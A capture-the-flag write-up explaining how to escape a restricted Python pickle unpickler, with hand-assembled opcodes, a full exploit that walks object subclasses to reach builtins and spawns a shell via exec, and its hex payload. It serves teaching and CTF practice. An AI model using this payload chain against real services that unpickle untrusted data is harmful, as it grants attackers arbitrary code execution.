Now that kmh is gone, clam’s been going through pickle withdrawal. To help him cope, he wrote his own pickle pyjail. It’s nothing like kmh’s, but maybe it’s enough.
Language jails are rapidly becoming one of my CTF areas of expertise. Not sure how I feel about that.
#!/usr/local/bin/python3
import pickle
import io
import sys

module = type(__builtins__)
empty = module("empty")
empty.empty = empty
sys.modules["empty"] = empty


class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("e-legal")


lepickle = bytes.fromhex(input("Enter hex-encoded pickle: "))
if len(lepickle) > 400:
    print("your pickle is too large for my taste >:(")
else:
    SafeUnpickler(io.BytesIO(lepickle)).load()
pickle is a Python object serialization format. As the docs page loudly proclaims, it is not secure. Roughly the simplest possible code to pop a shell (adapted from David Hamann, who constructs a more realistic RCE) looks like:
import os
import pickle
class Exploit:
    def __reduce__(self):
        return os.system, ("sh",)  # unpickling will call os.system("sh")
pickle.loads(pickle.dumps(Exploit()))
At a high level, the pickle format is a stack-based mini-language. It's not much of a language in and of itself: it has no control flow whatsoever and just executes opcodes from start to end. (Each opcode is one byte and is followed by zero or more arguments, whose format depends on the opcode. Each argument is a fixed number of bytes, a length-prefixed run of bytes, or an arbitrary number of bytes up to the next newline.)

But, crucially, the pickle language has the opcodes GLOBAL, which can look up any global, and REDUCE, which can call any callable Python object. Using these two opcodes, you can call just about any Python built-in function with any conceivable argument, for example, os.system with a command to pop a shell. This is why pickle is completely insecure by default.
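To make the GLOBAL/REDUCE mechanics concrete, here is a minimal hand-assembled pickle that uses the same two opcodes, but calls the harmless built-in len instead of os.system. The choice of builtins.len and the argument "abc" is purely illustrative; the opcode constants are the ones the pickle module exports.

```python
import pickle

# GLOBAL pushes builtins.len (module and name are each newline-terminated),
# UNICODE pushes the string "abc", TUPLE1 wraps it into the argument tuple ("abc",),
# REDUCE calls len("abc") and pushes the result, and STOP returns the top of the stack.
payload = (
    pickle.GLOBAL + b"builtins\nlen\n"
    + pickle.UNICODE + b"abc\n"
    + pickle.TUPLE1
    + pickle.REDUCE
    + pickle.STOP
)

result = pickle.loads(payload)
print(result)  # 3
```

Replacing builtins/len with os/system and "abc" with a shell command is all it takes to turn this into the exploit above.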
However, the behavior of the GLOBAL opcode above is determined by Unpickler.find_class, which can be overridden to restrict unpickling. DiceCTF 2022 actually had a pickle challenge with the most restricted unpickler imaginable:

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"HACKING DETECTED")
I never got around to writing that challenge up (maybe one day…), but I believe it was not intended to allow or require arbitrary code execution.
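A small sketch of what such an override does in practice: plain data never goes through find_class and loads normally, while anything that needs a global lookup (GLOBAL, or STACK_GLOBAL in newer protocols) is refused. The class name BlockAllGlobals and the helper restricted_loads are hypothetical names for illustration.

```python
import io
import pickle


class BlockAllGlobals(pickle.Unpickler):
    # Same idea as the DiceCTF unpickler: every global lookup is refused.
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"blocked {module}.{name}")


def restricted_loads(data):
    return BlockAllGlobals(io.BytesIO(data)).load()


# Dicts, lists and ints are built by dedicated opcodes, so find_class is never called.
plain = restricted_loads(pickle.dumps({"nums": [1, 2, 3]}))
print(plain)

# Pickling a function stores a reference to it, which must be resolved via find_class.
rejected = False
try:
    restricted_loads(pickle.dumps(len))
except pickle.UnpicklingError as exc:
    rejected = True
    print("rejected:", exc)
```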
Well, in this challenge, find_class is still pretty restricted. We are only allowed to access properties of the empty module, and if we copy the bit of code that creates empty into a REPL to investigate, it doesn't seem like there are that many:

>>> dir(empty)
['__doc__', '__loader__', '__name__', '__package__', '__spec__', 'empty']
But this is misleading; empty has a few properties that every Python object has by dint of inheritance, which are the same properties we use in the standard jailbreaks for eval(..., {"__builtins__": {}}). For example:

>>> empty.__class__
<class 'module'>
>>> empty.__class__.__base__
<class 'object'>
>>> empty.__class__.__base__.__subclasses__()
[<class 'type'>, ... (a lot of subclasses I will omit here)]
To have a target to aim for, I'll just grab the headlining quote in Finding Python3 built-ins:

[t for t in ().__class__.__base__.__subclasses__() if t.__name__ == 'Sized'][0].__len__.__globals__['__builtins__']
If we get that far, we're home free: we can grab exec or eval, or __import__ the os module, or pull off many other kinds of mischief.
Now, the filtered list comprehension is probably out of our reach to express in pickle code, so we'll just try to get our pickle to do the following (135 is the index of Sized in the server's list of __subclasses__, which I found by looking locally and then just trying nearby numbers against the server):

empty.__class__.__base__.__subclasses__()[135].__len__.__globals__['__builtins__']
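The "looking locally" step might be sketched like this: it runs the filtered comprehension once, keeps the index, and follows the rest of the chain to confirm it reaches the builtins. The index it prints is specific to your interpreter and will very likely not be 135.

```python
import collections.abc  # makes sure _collections_abc.Sized has been created

# object.__subclasses__() is what empty.__class__.__base__.__subclasses__()
# evaluates to, since a module's class is `module` and its base is `object`.
subclasses = object.__subclasses__()

# The filtered comprehension from above, but keeping the index so it can be
# hard-coded into the pickle.
index = next(i for i, cls in enumerate(subclasses) if cls.__name__ == "Sized")
sized = subclasses[index]

# Sized.__len__ is a plain Python function, so it carries the globals dict of
# the module that defined it, and that dict holds a reference to the builtins.
builtins_ns = sized.__len__.__globals__["__builtins__"]

print("Sized is at index", index)
print(builtins_ns["exec"] is exec)  # True
```

Note that the exploit below encodes the index with BININT1, which only holds values 0 to 255.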
This is still a little trickier than it sounds. Some resources like "Can I safely unpickle untrusted data?" make it sound like we can grab attributes willy-nilly, but getattr is not actually something we have available as a native pickle opcode (short of literally grabbing the getattr function with GLOBAL, which the overridden find_class blocks). Instead, pickle just has opcodes for setattr and setitem. From the design standpoint of pickle, this makes sense: opcodes are meant to help you construct data, not access it, and you shouldn't need to get attributes of the data you constructed, since you probably put them there yourself. But it makes our job a little more annoying.
The key insight that allows us to get over this hurdle is that the GLOBAL opcode uses getattr internally. What's more, in pickle protocol 4, GLOBAL supports dotted paths (which is why the challenge checks name.count(".")): calling GLOBAL with foo and "bar.baz" as arguments will get you foo.bar.baz. The challenge tries to limit how deep we can reach with the check that name.count(".") <= 1, which allows at most one dot per name. But because we can use the SETITEM opcode to set items on empty.__dict__, we can stash intermediate results in empty and then go through empty to access their attributes with a dotted path. That is, given some value foo whose bar attribute we want, we could write pickle opcodes that roughly do the following:

empty.__dict__['foo'] = foo
empty.foo.bar
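Here is a minimal local sketch of the stash trick against a replica of the challenge's unpickler. The target, object.__name__, is arbitrary and harmless: reaching it directly needs two dots and is rejected, but stashing object as empty.a first brings it within reach. One deliberate swap from the challenge: the module type is taken from type(sys), because type(__builtins__) only yields the module type when run as __main__.

```python
import io
import pickle
import sys

# Local replica of the challenge setup.
empty = type(sys)("empty")
empty.empty = empty
sys.modules["empty"] = empty


class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("e-legal")


def restricted_load(data):
    return SafeUnpickler(io.BytesIO(data)).load()


# Direct attempt: empty.__class__.__base__.__name__ has two dots, so it is refused.
direct = pickle.PROTO + b"\x04" + pickle.GLOBAL + b"empty\n__class__.__base__.__name__\n" + pickle.STOP
try:
    restricted_load(direct)
    blocked = False
except pickle.UnpicklingError:
    blocked = True

# Same target via a stash: empty.a = object, then read empty.a.__name__.
stashed = (
    pickle.PROTO + b"\x04"                            # dotted names need protocol 4
    + pickle.GLOBAL + b"empty\n__dict__\n"            # push empty.__dict__
    + pickle.UNICODE + b"a\n"                         # push the key "a"
    + pickle.GLOBAL + b"empty\n__class__.__base__\n"  # push object (one dot: allowed)
    + pickle.SETITEM                                  # empty.__dict__["a"] = object
    + pickle.POP                                      # discard empty.__dict__
    + pickle.GLOBAL + b"empty\na.__name__\n"          # object.__name__ (one dot: allowed)
    + pickle.STOP
)
result = restricted_load(stashed)

print(blocked, result)  # True object
```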
(I got stuck getting this to work for a while because I didn’t realize that this requires protocol version 4+, and that that’s still something you need to express in the pickle code. The documentation didn’t help — the pickletools source code mentions in one comment, “However, a pickle does not contain its version number embedded within it.” Eventually I figured this out by manually pickling something on a dotted path and disassembling the pickle.)
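That discovery process can be reproduced by pickling any object that lives on a dotted path with protocol 4 and disassembling the result. Here json.JSONEncoder.default is just a convenient standard-library function with a dotted qualified name ("JSONEncoder.default"); any nested function or class would do. The first opcode is PROTO with argument 4, which is exactly the header the exploit needs to spell out by hand.

```python
import json
import pickle
import pickletools

# A function whose qualified name contains a dot.
data = pickle.dumps(json.JSONEncoder.default, protocol=4)

# genops yields (opcode_info, argument, byte_position) triples.
ops = list(pickletools.genops(data))
first_op, first_arg, _ = ops[0]
print(first_op.name, first_arg)  # PROTO 4

# The dotted name shows up verbatim as one of the string arguments.
strings = [arg for _, arg, _ in ops if isinstance(arg, str)]
print(strings)

pickletools.dis(data)  # human-readable disassembly of the whole pickle
```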
To put together the full exploit, we just need to look up the opcodes we need and concatenate them with the desired arguments. Each opcode is available as a constant in the pickle module, so we can write pretty literate code. The opcodes we use below are:
- PROTO, which takes a byte as an argument and indicates that the pickle uses that protocol version
- GLOBAL, which takes two newline-delimited strings (a module name and an attribute name), resolves them through find_class, and pushes the result
- UNICODE, which takes a newline-delimited string and pushes it onto the stack
- SETITEM, which pops c, b, a from the stack, sets a[b] = c, and pushes a back
- EMPTY_TUPLE, which pushes a length-0 tuple
- REDUCE, which pops a tuple of arguments and a function from the stack, calls the function with the arguments, and pushes the result back onto the stack
- BININT1, which takes a byte as an argument and pushes it as an integer
- TUPLE1, which constructs a length-1 tuple from the top of the stack
- POP, which pops an element off the stack and discards it (not really necessary)
- STOP, which concludes the program (not really necessary)
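The opcode byte values, argument formats, and minimum protocol versions can all be looked up programmatically, since pickletools.opcodes carries the documentation for every opcode. A small sketch that cross-checks the list above against the constants exported by pickle:

```python
import pickle
import pickletools

# The opcodes used by the exploit, in the order they are listed above.
USED = ["PROTO", "GLOBAL", "UNICODE", "SETITEM", "EMPTY_TUPLE",
        "REDUCE", "BININT1", "TUPLE1", "POP", "STOP"]

info = {op.name: op for op in pickletools.opcodes}

for name in USED:
    op = info[name]
    byte = getattr(pickle, name)              # the constant exported by pickle
    assert op.code.encode("latin-1") == byte  # pickletools stores it as a 1-char str
    arg = op.arg.name if op.arg is not None else "-"
    print(f"{name:12} {byte!r:8} arg={arg:24} since protocol {op.proto}")
```

The byte values printed here are the ones visible in the final bytestring (for example GLOBAL is c, SETITEM is s, and TUPLE1 is \x85).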
Here’s my full exploit:
import pickle

body = (
    # Set the protocol version so that dotted paths are allowed
    pickle.PROTO + b'\x04' +

    # Push empty.__dict__. This will stay on the stack until the end.
    # We will call SETITEM on it.
    pickle.GLOBAL + b'empty\n__dict__\n' +

    # empty.a = empty.__class__.__base__ = object
    pickle.UNICODE + b'a\n' +
    pickle.GLOBAL + b'empty\n__class__.__base__\n' +
    pickle.SETITEM +

    # empty.b = empty.a.__subclasses__() = object.__subclasses__()
    pickle.UNICODE + b'b\n' +
    pickle.GLOBAL + b'empty\na.__subclasses__\n' +
    pickle.EMPTY_TUPLE +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.c = empty.b[135] = Sized
    pickle.UNICODE + b'c\n' +
    pickle.GLOBAL + b'empty\nb.__getitem__\n' +
    # 135 was the value that worked against the remote server, but is not by
    # any means constant between Python versions. I ran the snippet earlier to
    # get the value on my versions of Python and then tweaked it in this
    # exploit until it worked. Wrong values will just say "Cannot get
    # attribute".
    pickle.BININT1 + bytes([135]) +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # empty.d = empty.c.__len__
    pickle.UNICODE + b'd\n' +
    pickle.GLOBAL + b'empty\nc.__len__\n' +
    pickle.SETITEM +

    # empty.e = empty.d.__globals__
    pickle.UNICODE + b'e\n' +
    pickle.GLOBAL + b'empty\nd.__globals__\n' +
    pickle.SETITEM +

    # empty.f = empty.e.__getitem__("__builtins__") = empty.e["__builtins__"]
    pickle.UNICODE + b'f\n' +
    pickle.GLOBAL + b'empty\ne.__getitem__\n' +
    pickle.UNICODE + b'__builtins__\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.SETITEM +

    # we're ready for the finale; pop empty.__dict__
    # (not that we really need to)
    pickle.POP +

    # pop a shell:
    # empty.f.__getitem__("exec")('__import__("os").system("sh")')
    pickle.GLOBAL + b'empty\nf.__getitem__\n' +
    pickle.UNICODE + b'exec\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +
    pickle.UNICODE + b'__import__("os").system("sh")\n' +
    pickle.TUPLE1 +
    pickle.REDUCE +

    # we don't really need this either
    pickle.STOP
)

# pickle.loads(body)
# pickletools.dis(body)
print(body.hex())
The hexed exploit is:
800463656d7074790a5f5f646963745f5f0a56610a63656d7074790a5f5f636c6173735f5f2e5f5f626173655f5f0a7356620a63656d7074790a612e5f5f737562636c61737365735f5f0a29527356630a63656d7074790a622e5f5f6765746974656d5f5f0a4b8785527356640a63656d7074790a632e5f5f6c656e5f5f0a7356650a63656d7074790a642e5f5f676c6f62616c735f5f0a7356660a63656d7074790a652e5f5f6765746974656d5f5f0a565f5f6275696c74696e735f5f0a8552733063656d7074790a662e5f5f6765746974656d5f5f0a56657865630a8552565f5f696d706f72745f5f28226f7322292e73797374656d2822736822290a85522e
The bytestring is:
b'\x80\x04cempty\n__dict__\nVa\ncempty\n__class__.__base__\nsVb\ncempty\na.__subclasses__\n)RsVc\ncempty\nb.__getitem__\nK\x87\x85RsVd\ncempty\nc.__len__\nsVe\ncempty\nd.__globals__\nsVf\ncempty\ne.__getitem__\nV__builtins__\n\x85Rs0cempty\nf.__getitem__\nVexec\n\x85RV__import__("os").system("sh")\n\x85R.'
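Before throwing a payload at the server, the whole chain could be sanity-checked locally against a replica of the challenge. The sketch below rebuilds the same opcode sequence with small hypothetical helpers (build_payload, text, glob, stash), but makes two assumed changes: the final call is builtins["len"]("abc") instead of exec with a shell command, and the subclass index is computed at runtime and encoded with BININT (a 4-byte signed integer) rather than hard-coded with BININT1, in case the local index exceeds 255.

```python
import io
import pickle
import struct
import sys

# Local replica of the challenge (module type taken from sys, see earlier note).
empty = type(sys)("empty")
empty.empty = empty
sys.modules["empty"] = empty


class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "empty" and name.count(".") <= 1:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("e-legal")


def build_payload(sized_index, func, arg):
    """Same chain as the exploit, but the final call is builtins[func](arg)."""
    def text(s):  # push a str
        return pickle.UNICODE + s.encode() + b"\n"

    def glob(path):  # push empty.<path>
        return pickle.GLOBAL + b"empty\n" + path.encode() + b"\n"

    def stash(key, value_ops):  # empty.__dict__[key] = <value_ops result>
        return text(key) + value_ops + pickle.SETITEM

    return (
        pickle.PROTO + b"\x04"
        + glob("__dict__")
        + stash("a", glob("__class__.__base__"))
        + stash("b", glob("a.__subclasses__") + pickle.EMPTY_TUPLE + pickle.REDUCE)
        + stash("c", glob("b.__getitem__") + pickle.BININT + struct.pack("<i", sized_index)
                + pickle.TUPLE1 + pickle.REDUCE)
        + stash("d", glob("c.__len__"))
        + stash("e", glob("d.__globals__"))
        + stash("f", glob("e.__getitem__") + text("__builtins__") + pickle.TUPLE1 + pickle.REDUCE)
        + pickle.POP
        + glob("f.__getitem__") + text(func) + pickle.TUPLE1 + pickle.REDUCE
        + text(arg) + pickle.TUPLE1 + pickle.REDUCE
        + pickle.STOP
    )


subclasses = object.__subclasses__()
index = next(i for i, cls in enumerate(subclasses) if cls.__name__ == "Sized")
payload = build_payload(index, "len", "abc")
result = SafeUnpickler(io.BytesIO(payload)).load()
print(len(payload), "bytes ->", result)
```

If this loads cleanly, swapping "len"/"abc" back for exec and the shell command (and the local index for the server's) gives the real payload.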
Once we pop a shell, we can cd / and cat flag.txt, and we're done!
actf{__i_miss_kmh11_pyjails__}